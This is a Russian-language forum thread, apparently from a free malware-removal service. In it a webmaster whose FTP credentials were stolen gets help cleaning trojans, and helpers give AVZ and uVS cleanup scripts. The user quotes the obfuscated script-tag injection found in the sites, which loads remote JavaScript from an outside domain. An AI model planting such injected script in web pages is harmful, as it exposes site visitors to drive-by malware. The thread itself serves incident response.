-
Взломали компьютер, а после сервера с сайтами
Здравствуйте уважаемые форумчане!
Проблема вот в чем.
Недели две назад в панели вебмастера системы Яндекс, стало выскакивать сообщение о том, что один из моих сайтов, распространяет вредоносный код, но я особо не придал этому значения, так как сообщение то появлялось, то пропадало. И вот неделю назад случилась ужасная вещь, заразилось шесть моих сайтов!
Причем расположенных на разных хостингах и соответственно серверах. После удаления вредоносного кода и смены паролей, тот самый вредоносный код снова появлялся, в течении одного-двух часов.
Вообщем перерыв кучу информации я понял, что возможно троянский вирус крадет коды FTP соединения с моего локального(домашнего) компьютера, при заходе на сайт через FTP. Как раз месяц назад у меня кончилась лицензия на антивирус Касперского, и я не купил новый ключ (а зря).
В общем не буду долго рассказывать что и как я делал, скажу вкратце.
1. Проверил компьютер, с помощь утилиты от Dr. Web в безопасном режиме. Было найдено около 8-вирусов, троянов и разных нежелательных файлов.
2. Проверил компьютер с помощью AVPTool от "Касперского". Нашел еще трех троянов.
3. После чего удалил Касперского без ключа, и установил Eset NOD32. И нашел еще четыре трояна и пару десятков подозрительных файлов (я их удалил на всякий пожарный, т.к. они были не системные и на работу ПК особо не влияли). У NOD32 хороший эврестический анализ, поэтому я скачал зараженный сайт с сервера себе на компьютер проверил нодом, и нашел еще один троян(хотя искал совсем не его).
В общем после всего этого, я еще раз поменял все пароли, и на одном хостинге вроде вирус ушел (прошли уже сутки, обычно за это время вредоносный код уже возвращался). А вот на втором ни в какую.
Возможно есть еще какой-то вирус, который ворует мои коды, но почему-то антивирусники его не находят. Проверил все по вашей инструкции - http://virusinfo.info/content.php?r=136-pravila
Файлы логов выкладываю во вложениях.
P.S. Кстати код который подзагружается в один из файлов сайта выглядит так, может кто знает как его побороть
<script>;document.write('<s'+'c'+'ript sr'+'c=h'+'tt'+'p://por'+'nite'+'rnns.r'+'u/8'+'1.j'+'s></sc'+'ri'+'pt>');</script
Помогите пожалуйста.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Уважаемый(ая) teropiuty, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
-
-
Выполните скрипт в AVZ:
Код:
begin
SearchRootkit(true, true);
DeleteService('RelevantKnowledge');
DeleteFile('C:\Users\Я\AppData\Roaming\Microsoft\Gsogom.exe');
DeleteFile('C:\Users\Я\AppData\Roaming\Microsoft\Zsogof.exe');
ExecuteSysClean;
ExecuteRepair(3);
ExecuteRepair(4);
RebootWindows(true);
end.
Компьютер перезагрузится.
Сделайте полный образ автозапуска uVS.
-
-
Благодарю за ответ.
Все сделал, как вы сказали. Файл лога прикрепляю.
-
Выполните скрипт в uVS:
Код:
;uVS v3.80.12 [http://dsrt.dyndns.org]
;Target OS: NTv6.0
delref HTTP://WEBALTA.RU
delref HTTP://WWW.DELTA-SEARCH.COM/?AFFID=119357&BABSRC=HP_SS&MNTRID=88F8001D7DD2C19A
exec MsiExec.exe /quiet /I{86D4B82A-ABED-442A-BE86-96357B70F4FE}
exec MsiExec.exe /quiet /X{26A24AE4-039D-4CA4-87B4-2F83217017FF}
exec MsiExec.exe /quiet /X{26A24AE4-039D-4CA4-87B4-2F83216031FF}
exec MsiExec.exe /quiet /I{3248F0A8-6813-11D6-A77B-00B0D0160070}
uidel C:\Program Files\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge
deltmp
restart
Компьютер перезагрузится.
Выполните скрипт в AVZ при наличии доступа в интернет:
Код:
var
LogPath : string;
ScriptPath : string;
begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к броузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.
-
-
Я пока ничего не выполнил. Появилась другая проблема. Память да диске С (системном диске) куда-то делать гигабайт 20 сразу.
-
Так выполните, места свободного прибавится.
-
-
Все сделал как вы сказали, память и правду отчистилась. Единственное что, после выполнения скрипта для uVS, и перезагрузки, никакого файла с префиксом ZOO_ не появилось.
-
И не должно было появиться.
Устраняйте уязвимости.
-
-
Уязвимости устранил. Из было всего три:
Код:
Уязвимость в MSXML делает возможным удаленное выполнение кода
http://www.microsoft.com/downloads/details.aspx?FamilyID=1e2738b9-d3c2-4dfe-8a79-335d5feee55b
Запускайте обновление от имени Администратора
Множественные уязвимости в Java JDK и JRE (32-разрядная версия). Деинсталлируйте старую версию и установите новую:
http://www.java.com/ru/download/manual_v6.jsp
Opera 11.50 устарела. Удалите её или установите новую
http://www.opera.com/browser/download
-
-
-
Благодарю за помощь. Пока что все работает отлично.